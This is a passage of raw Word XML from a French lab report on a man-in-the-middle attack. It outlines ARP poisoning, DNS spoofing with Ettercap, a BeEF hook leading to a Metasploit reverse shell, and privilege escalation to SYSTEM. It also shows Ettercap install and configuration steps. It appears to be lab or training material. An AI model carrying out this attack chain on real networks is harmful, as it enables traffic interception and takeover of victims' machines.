    <w:p w14:paraId="78A5A08B" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154D6234" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C35BB78" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6C8D79" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47087C04" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE62706" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C5BD9D" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188B6F2C" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00DE5C2B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53884CC2" w14:textId="11DABA29" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc133586224"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Schéma réseau</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6A2C5E3E" w14:textId="055026CC" w:rsidR="00E90DEB" w:rsidRDefault="00E43848" w:rsidP="00E43848">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A2491B9" wp14:editId="5FD42ED6">
            <wp:extent cx="3505200" cy="2441907"/>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07207" cy="2443305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7ABC78" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E40C269" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6477759E" w14:textId="3C0637BC" w:rsidR="00E43848" w:rsidRDefault="00E43848" w:rsidP="00E43848">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc133586225"/>
      <w:r>
        <w:t>Schéma de l’attaque</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2BEC0035" w14:textId="55486EDB" w:rsidR="00E90DEB" w:rsidRDefault="004D0AC6" w:rsidP="004D0AC6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DC8CA20" wp14:editId="0BFC5284">
            <wp:extent cx="5143500" cy="3196682"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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5069" cy="3203872"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC43318" w14:textId="77777777" w:rsidR="00E90DEB" w:rsidRDefault="00E90DEB" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D33295D" w14:textId="3E984440" w:rsidR="00E43848" w:rsidRDefault="004D0AC6" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cette attaque va ce déroulé en plusieurs temps, en premiers nous allons corrompre la table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de la passerelle en ce fessant passer pour notre victime pour récupérer le trafique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D51D38" w14:textId="2C3C06FA" w:rsidR="004D0AC6" w:rsidRDefault="004D0AC6" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Grace à notre plugin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dns_spoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nous redirigeons le flux linux.org vers notre machine Kali sur le </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ou écoute le service </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qui lui va rediriger vers le </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ou écoute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A655E69" w14:textId="66C8B7E9" w:rsidR="004D0AC6" w:rsidRDefault="004D0AC6" w:rsidP="00E90DEB">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une fois la victime connecté sur le site de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, nous envoyons notre </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> qui retourne un </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D988CB9" w14:textId="291C3C9F" w:rsidR="00E90DEB" w:rsidRPr="009D01D6" w:rsidRDefault="004D0AC6" w:rsidP="004D0AC6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensuite nous allons transformer notre </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et utiliser un exploit qui nous permet de récupérer les </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>droits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> du compte utilisateur qui nous permettra de récupérer le compte </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AUTORITY/System</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254BE72C" w14:textId="7156B815" w:rsidR="00C00770" w:rsidRDefault="00087C41" w:rsidP="00087C41">
      <w:pPr>
        <w:pStyle w:val="EF-chapitretitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc133586226"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Préparation de l’attaque</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7D03D931" w14:textId="5FDE13C5" w:rsidR="00087C41" w:rsidRDefault="00E43848" w:rsidP="00087C41">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc133586227"/>
      <w:r>
        <w:t>Paramétrage d’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00087C41">
        <w:t>Ettercap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52A40F86" w14:textId="68D2C350" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc133586228"/>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="60858849" w14:textId="44ECE25F" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41">
      <w:r>
        <w:t xml:space="preserve">Pour installer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A70C19" w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ttercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, ouvrir un terminal en root ou utiliser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000B3275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> devant les commandes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21311861" w14:textId="7686921D" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087C41">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">apt install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087C41">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087C41">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-text-only -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C289D7" w14:textId="77777777" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3377B4C0" w14:textId="2A21DD39" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc133586229"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paramétrage</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67797ABC" w14:textId="04678E9E" w:rsidR="003F382E" w:rsidRPr="001F3D24" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="Titre5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F3D24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>etter.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F3D24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26397449" w14:textId="63A63B19" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:r w:rsidRPr="003F382E">
        <w:t>En premier on va p</w:t>
      </w:r>
      <w:r>
        <w:t>aramétrer le fichier de configuration</w:t>
      </w:r>
      <w:r w:rsidR="001F3D24">
        <w:t xml:space="preserve"> « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F3D24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>etter.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F3D24">
        <w:t> »</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:t>d’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A70C19" w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ttercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour son fonctionnement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8643C" w14:textId="0A378DB2" w:rsidR="003F382E" w:rsidRPr="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="003F382E">
        <w:t>nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F382E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F382E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F382E">
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F382E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F382E">
        <w:t>etter.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AE29AD3" w14:textId="397957EF" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:r>
        <w:t>Nous commentons les lignes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F382E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ec_uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t> et </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F382E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ec_gid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en mettant un </w:t>
      </w:r>
      <w:r w:rsidRPr="003F382E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5964AA" w14:textId="56A44B0D" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:r>
        <w:t>Puis nous ajoutons à la suite les lignes suivantes :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58269F77" w14:textId="7EE24F2D" w:rsidR="003F382E" w:rsidRPr="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ec_uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D266D" w14:textId="68C5F3C4" w:rsidR="003F382E" w:rsidRPr="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ec_gid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31383E55" w14:textId="77777777" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544D10C3" w14:textId="4BD47924" w:rsidR="00087C41" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003F382E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C0E28C3" wp14:editId="418BA45C">
            <wp:extent cx="5204460" cy="4912964"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="52" name="Picture 5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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5206680" cy="4915059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20958EC2" w14:textId="6112FD1C" w:rsidR="003F382E" w:rsidRPr="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Puis plus loin, nous décommentons les lignes concernant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F382E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dans la partie Linux</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD897B0" w14:textId="209C529D" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="003F382E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="281A11B3" wp14:editId="7DD6C396">
            <wp:extent cx="5759450" cy="1052830"/>
            <wp:effectExtent l="0" t="0" r="0"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22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759450" cy="1052830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBA7E7B" w14:textId="77777777" w:rsidR="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3EBC65" w14:textId="07DE3774" w:rsidR="003F382E" w:rsidRPr="001F3D24" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="Titre5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F3D24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>etter.dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F3D24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07937007" w14:textId="29BD3729" w:rsidR="003F382E" w:rsidRDefault="001F3D24" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Maintenant nous allons paramétrer le fichier « </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>etter.dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> » pour le </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598B87B" w14:textId="5954B1C4" w:rsidR="001F3D24" w:rsidRPr="001F3D24" w:rsidRDefault="001F3D24" w:rsidP="001F3D24">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r w:rsidRPr="001F3D24">
        <w:t>nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F3D24">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F3D24">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F3D24">
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F3D24">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F3D24">
        <w:t>etter.dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E412F64" w14:textId="4C2225A6" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Nous remplissons les lignes comme ci-dessous sous le nom de domaine que l’on veut spoofer</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>.</w:t>
